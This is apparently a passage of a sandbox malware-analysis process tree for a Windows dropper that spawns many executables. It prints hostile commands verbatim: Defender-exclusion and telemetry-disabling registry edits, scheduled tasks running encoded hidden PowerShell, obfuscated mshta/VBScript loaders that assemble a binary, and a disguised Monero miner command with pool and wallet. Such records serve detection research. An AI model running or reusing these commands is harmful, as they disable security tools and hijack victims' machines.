                                                                                                                                                                                                                      /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
                                                                                                                                                                                                                      10⤵
                                                                                                                                                                                                                        PID:2488
                                                                                                                                                                                                                        • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                                                          REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
                                                                                                                                                                                                                          11⤵
                                                                                                                                                                                                                            PID:3168
                                                                                                                                                                                                                          • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                                                            REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
                                                                                                                                                                                                                            11⤵
                                                                                                                                                                                                                              PID:4180
                                                                                                                                                                                                                        • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                                          "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
                                                                                                                                                                                                                          9⤵
                                                                                                                                                                                                                            PID:1036
                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                              /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
                                                                                                                                                                                                                              10⤵
                                                                                                                                                                                                                                PID:2976
                                                                                                                                                                                                                                • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                  REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                                  11⤵
                                                                                                                                                                                                                                    PID:6200
                                                                                                                                                                                                                                  • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                    REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                                    11⤵
                                                                                                                                                                                                                                      PID:6356
                                                                                                                                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                  schtasks /CREATE /TN "gwZButJxd" /SC once /ST 00:16:32 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                                                                                                                                                                                  9⤵
                                                                                                                                                                                                                                  • Creates scheduled task(s)
                                                                                                                                                                                                                                  PID:3104
                                                                                                                                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                  schtasks /CREATE /TN "bvmcjEjDUxHOOxIZsK" /SC once /ST 00:43:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\prNnatYmCsQFEeCzn\OFTJvYQhcKRKyYZ\DQKAiaL.exe\" uG /site_id 394347 /S" /V1 /F
                                                                                                                                                                                                                                  9⤵
                                                                                                                                                                                                                                  • Creates scheduled task(s)
                                                                                                                                                                                                                                  PID:7908
                                                                                                                                                                                                                          • C:\Users\Admin\Documents\o9nrehqrFbYg4j9KwudxsHl0.exe
                                                                                                                                                                                                                            "C:\Users\Admin\Documents\o9nrehqrFbYg4j9KwudxsHl0.exe"
                                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                                              PID:6552
                                                                                                                                                                                                                            • C:\Users\Admin\Documents\CH3VcmPBquQIsqEibdYSn1Ff.exe
                                                                                                                                                                                                                              "C:\Users\Admin\Documents\CH3VcmPBquQIsqEibdYSn1Ff.exe"
                                                                                                                                                                                                                              6⤵
                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                              • Checks BIOS information in registry
                                                                                                                                                                                                                              • Checks whether UAC is enabled
                                                                                                                                                                                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                              PID:6444
                                                                                                                                                                                                                            • C:\Users\Admin\Documents\ST4VEAqz3Fu2n2GSlZNt2Wu2.exe
                                                                                                                                                                                                                              "C:\Users\Admin\Documents\ST4VEAqz3Fu2n2GSlZNt2Wu2.exe"
                                                                                                                                                                                                                              6⤵
                                                                                                                                                                                                                                PID:6308
                                                                                                                                                                                                                              • C:\Users\Admin\Documents\B4V1AuD7VbPtVbiyHyW963RL.exe
                                                                                                                                                                                                                                "C:\Users\Admin\Documents\B4V1AuD7VbPtVbiyHyW963RL.exe"
                                                                                                                                                                                                                                6⤵
                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                • Checks BIOS information in registry
                                                                                                                                                                                                                                • Checks whether UAC is enabled
                                                                                                                                                                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                PID:6972
                                                                                                                                                                                                                              • C:\Users\Admin\Documents\AnTZwbNkMWj8iFOIKO9OkXkJ.exe
                                                                                                                                                                                                                                "C:\Users\Admin\Documents\AnTZwbNkMWj8iFOIKO9OkXkJ.exe"
                                                                                                                                                                                                                                6⤵
                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                • Checks BIOS information in registry
                                                                                                                                                                                                                                • Checks whether UAC is enabled
                                                                                                                                                                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                PID:6964
                                                                                                                                                                                                                              • C:\Users\Admin\Documents\Oj7tpkKQFiNNQyRbdGqQN6Sn.exe
                                                                                                                                                                                                                                "C:\Users\Admin\Documents\Oj7tpkKQFiNNQyRbdGqQN6Sn.exe"
                                                                                                                                                                                                                                6⤵
                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                • Checks BIOS information in registry
                                                                                                                                                                                                                                • Checks whether UAC is enabled
                                                                                                                                                                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                PID:6956
                                                                                                                                                                                                                              • C:\Users\Admin\Documents\xef09mQzObeSCU0ya2bv5DDv.exe
                                                                                                                                                                                                                                "C:\Users\Admin\Documents\xef09mQzObeSCU0ya2bv5DDv.exe"
                                                                                                                                                                                                                                6⤵
                                                                                                                                                                                                                                  PID:7152
                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\2679649.scr
                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\2679649.scr" /S
                                                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                                                      PID:2888
                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\8124135.scr
                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\8124135.scr" /S
                                                                                                                                                                                                                                      7⤵
                                                                                                                                                                                                                                      • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                                      • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                      • Suspicious behavior: SetClipboardViewer
                                                                                                                                                                                                                                      PID:5664
                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\4041885.scr
                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\4041885.scr" /S
                                                                                                                                                                                                                                      7⤵
                                                                                                                                                                                                                                      • Checks BIOS information in registry
                                                                                                                                                                                                                                      • Checks whether UAC is enabled
                                                                                                                                                                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                      PID:7548
                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\2245796.scr
                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\2245796.scr" /S
                                                                                                                                                                                                                                      7⤵
                                                                                                                                                                                                                                      • Checks BIOS information in registry
                                                                                                                                                                                                                                      • Checks whether UAC is enabled
                                                                                                                                                                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                      PID:1016
                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\5290757.scr
                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\5290757.scr" /S
                                                                                                                                                                                                                                      7⤵
                                                                                                                                                                                                                                        PID:5900
                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c Fri1015b9a4e0b.exe
                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                                                                                                                                                  PID:1988
                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS8A2064A0\Fri1015b9a4e0b.exe
                                                                                                                                                                                                                                    Fri1015b9a4e0b.exe
                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                    PID:3524
                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 3524 -s 300
                                                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                                                      • Program crash
                                                                                                                                                                                                                                      • Checks processor information in registry
                                                                                                                                                                                                                                      • Enumerates system info in registry
                                                                                                                                                                                                                                      PID:1652
                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c Fri10b0a06a73706.exe
                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                                                                                                                                                  PID:3220
                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS8A2064A0\Fri10b0a06a73706.exe
                                                                                                                                                                                                                                    Fri10b0a06a73706.exe
                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                    PID:4544
                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\6275696.scr
                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\6275696.scr" /S
                                                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                      PID:5936
                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\8063900.scr
                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\8063900.scr" /S
                                                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                                      • Adds Run key to start application
                                                                                                                                                                                                                                      PID:6004
                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
                                                                                                                                                                                                                                        7⤵
                                                                                                                                                                                                                                          PID:3356
                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\5560591.scr
                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\5560591.scr" /S
                                                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                        • Checks BIOS information in registry
                                                                                                                                                                                                                                        • Checks whether UAC is enabled
                                                                                                                                                                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                        PID:5248
                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\2290598.scr
                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\2290598.scr" /S
                                                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                        • Checks BIOS information in registry
                                                                                                                                                                                                                                        • Checks whether UAC is enabled
                                                                                                                                                                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                        PID:6680
                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\7691831.scr
                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\7691831.scr" /S
                                                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                        PID:888
                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c Fri106e757f6d75.exe
                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                    • Suspicious use of WriteProcessMemory
                                                                                                                                                                                                                                    PID:1892
                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS8A2064A0\Fri106e757f6d75.exe
                                                                                                                                                                                                                                      Fri106e757f6d75.exe
                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                                      • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                      PID:5012
                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS8A2064A0\Fri106e757f6d75.exe
                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\7zS8A2064A0\Fri106e757f6d75.exe
                                                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                        PID:5624
                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS8A2064A0\Fri106e757f6d75.exe
                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\7zS8A2064A0\Fri106e757f6d75.exe
                                                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                        PID:5856
                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c Fri1008c7d6874.exe
                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                      PID:4940
                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS8A2064A0\Fri1008c7d6874.exe
                                                                                                                                                                                                                                        Fri1008c7d6874.exe
                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                        PID:3932
                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c Fri103a7805577.exe
                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                        PID:2644
                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS8A2064A0\Fri103a7805577.exe
                                                                                                                                                                                                                                          Fri103a7805577.exe
                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                          PID:4772
                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
                                                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                                            PID:5836
                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe
                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"
                                                                                                                                                                                                                                              7⤵
                                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                                              PID:6124
                                                                                                                                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
                                                                                                                                                                                                                                                8⤵
                                                                                                                                                                                                                                                  PID:1884
                                                                                                                                                                                                                                                  • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                    schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
                                                                                                                                                                                                                                                    9⤵
                                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                                    • Creates scheduled task(s)
                                                                                                                                                                                                                                                    PID:7116
                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\services64.exe
                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\services64.exe"
                                                                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                  PID:5136
                                                                                                                                                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
                                                                                                                                                                                                                                                    9⤵
                                                                                                                                                                                                                                                      PID:5040
                                                                                                                                                                                                                                                      • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                        schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
                                                                                                                                                                                                                                                        10⤵
                                                                                                                                                                                                                                                        • Creates scheduled task(s)
                                                                                                                                                                                                                                                        PID:5344
                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
                                                                                                                                                                                                                                                      9⤵
                                                                                                                                                                                                                                                        PID:4844
                                                                                                                                                                                                                                                      • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                        C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.add/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6O4DG/ZgkwoY7/pmBv4ks3wJ7PR9JPsLklOJLkitFc6Y" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth
                                                                                                                                                                                                                                                        9⤵
                                                                                                                                                                                                                                                          PID:3964
                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe
                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe"
                                                                                                                                                                                                                                                      7⤵
                                                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                      PID:5236
                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\5502822.scr
                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\5502822.scr" /S
                                                                                                                                                                                                                                                        8⤵
                                                                                                                                                                                                                                                        • Suspicious behavior: SetClipboardViewer
                                                                                                                                                                                                                                                        PID:5656
                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\7045769.scr
                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\7045769.scr" /S
                                                                                                                                                                                                                                                        8⤵
                                                                                                                                                                                                                                                          PID:4608
                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\8706719.scr
                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\8706719.scr" /S
                                                                                                                                                                                                                                                          8⤵
                                                                                                                                                                                                                                                          • Checks BIOS information in registry
                                                                                                                                                                                                                                                          • Checks whether UAC is enabled
                                                                                                                                                                                                                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                          PID:5172
                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\8604003.scr
                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\8604003.scr" /S
                                                                                                                                                                                                                                                          8⤵
                                                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                                                          • Checks BIOS information in registry
                                                                                                                                                                                                                                                          • Checks whether UAC is enabled
                                                                                                                                                                                                                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                          PID:4796
                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\7889524.scr
                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\7889524.scr" /S
                                                                                                                                                                                                                                                          8⤵
                                                                                                                                                                                                                                                            PID:7616
                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\inst001.exe
                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\inst001.exe"
                                                                                                                                                                                                                                                          7⤵
                                                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                                                          PID:5440
                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\Firstoffer.exe
                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\Firstoffer.exe"
                                                                                                                                                                                                                                                          7⤵
                                                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                                                          PID:5696
                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 5696 -s 240
                                                                                                                                                                                                                                                            8⤵
                                                                                                                                                                                                                                                            • Program crash
                                                                                                                                                                                                                                                            • Checks processor information in registry
                                                                                                                                                                                                                                                            • Enumerates system info in registry
                                                                                                                                                                                                                                                            PID:7896
                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\ShadowVPNInstaller_t3.exe
                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\ShadowVPNInstaller_t3.exe"
                                                                                                                                                                                                                                                          7⤵
                                                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                          PID:3540
                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 3540 -s 616
                                                                                                                                                                                                                                                            8⤵
                                                                                                                                                                                                                                                            • Program crash
                                                                                                                                                                                                                                                            • Checks processor information in registry
                                                                                                                                                                                                                                                            • Enumerates system info in registry
                                                                                                                                                                                                                                                            PID:6884
                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 3540 -s 636
                                                                                                                                                                                                                                                            8⤵
                                                                                                                                                                                                                                                            • Program crash
                                                                                                                                                                                                                                                            • Checks processor information in registry
                                                                                                                                                                                                                                                            • Enumerates system info in registry
                                                                                                                                                                                                                                                            PID:6840
                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 3540 -s 780
                                                                                                                                                                                                                                                            8⤵
                                                                                                                                                                                                                                                            • Program crash
                                                                                                                                                                                                                                                            PID:6372
                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\setup.exe
                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\setup.exe"
                                                                                                                                                                                                                                                          7⤵
                                                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                                                          PID:4084
                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 4084 -s 632
                                                                                                                                                                                                                                                            8⤵
                                                                                                                                                                                                                                                            • Program crash
                                                                                                                                                                                                                                                            • Checks processor information in registry
                                                                                                                                                                                                                                                            • Enumerates system info in registry
                                                                                                                                                                                                                                                            PID:7960
                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\6.exe
                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\6.exe"
                                                                                                                                                                                                                                                          7⤵
                                                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                                                          PID:6244
                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
                                                                                                                                                                                                                                                            8⤵
                                                                                                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                                                                                                            PID:5712
                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe
                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe"
                                                                                                                                                                                                                                                          7⤵
                                                                                                                                                                                                                                                            PID:6784
                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                                              "C:\Windows\System32\mshta.exe" vbScriPt: CLOSe ( CreatEOBjECt ( "WScRIpt.sHell" ). rUn ( "CmD.Exe /Q /C COpy /Y ""C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe"" ..\4MCYlgNAW.eXE && StArT ..\4MCYlGNAW.EXE /pni3MGzH3fZ3zm0HbFMiEo11u& IF """" == """" for %z iN ( ""C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe"") do taskkill -f /Im ""%~nXz"" " , 0 , tRue ) )
                                                                                                                                                                                                                                                              8⤵
                                                                                                                                                                                                                                                                PID:1036
                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /Q /C COpy /Y "C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe" ..\4MCYlgNAW.eXE && StArT ..\4MCYlGNAW.EXE /pni3MGzH3fZ3zm0HbFMiEo11u& IF "" == "" for %z iN ( "C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe") do taskkill -f /Im "%~nXz"
                                                                                                                                                                                                                                                                  9⤵
                                                                                                                                                                                                                                                                    PID:5792
                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\4MCYlgNAW.eXE
                                                                                                                                                                                                                                                                      ..\4MCYlGNAW.EXE /pni3MGzH3fZ3zm0HbFMiEo11u
                                                                                                                                                                                                                                                                      10⤵
                                                                                                                                                                                                                                                                        PID:3896
                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                                                          "C:\Windows\System32\mshta.exe" vbScriPt: CLOSe ( CreatEOBjECt ( "WScRIpt.sHell" ). rUn ( "CmD.Exe /Q /C COpy /Y ""C:\Users\Admin\AppData\Local\Temp\4MCYlgNAW.eXE"" ..\4MCYlgNAW.eXE && StArT ..\4MCYlGNAW.EXE /pni3MGzH3fZ3zm0HbFMiEo11u& IF ""/pni3MGzH3fZ3zm0HbFMiEo11u"" == """" for %z iN ( ""C:\Users\Admin\AppData\Local\Temp\4MCYlgNAW.eXE"") do taskkill -f /Im ""%~nXz"" " , 0 , tRue ) )
                                                                                                                                                                                                                                                                          11⤵
                                                                                                                                                                                                                                                                            PID:2520
                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /Q /C COpy /Y "C:\Users\Admin\AppData\Local\Temp\4MCYlgNAW.eXE" ..\4MCYlgNAW.eXE && StArT ..\4MCYlGNAW.EXE /pni3MGzH3fZ3zm0HbFMiEo11u& IF "/pni3MGzH3fZ3zm0HbFMiEo11u" == "" for %z iN ( "C:\Users\Admin\AppData\Local\Temp\4MCYlgNAW.eXE") do taskkill -f /Im "%~nXz"
                                                                                                                                                                                                                                                                              12⤵
                                                                                                                                                                                                                                                                                PID:6812
                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                                                              "C:\Windows\System32\mshta.exe" vbscript: cLoSE ( cREAtEObJect ( "wSCRipT.SHELl" ). Run ("Cmd /Q /C eCHo | SeT /p = ""MZ"" > 4~T6.Kj6& cOPy /b /y 4~T6.kJ6 +JJDPQL_.2B+ Z8ISJ6._Nm+oAykH.~~ +kdDPiLEn.~T5 + MZaNA.E ..\Kz_AMsXL.6g & Del /q *& STArT control ..\kZ_AmsXL.6G " ,0 , trUE ) )
                                                                                                                                                                                                                                                                              11⤵
                                                                                                                                                                                                                                                                                PID:7880
                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
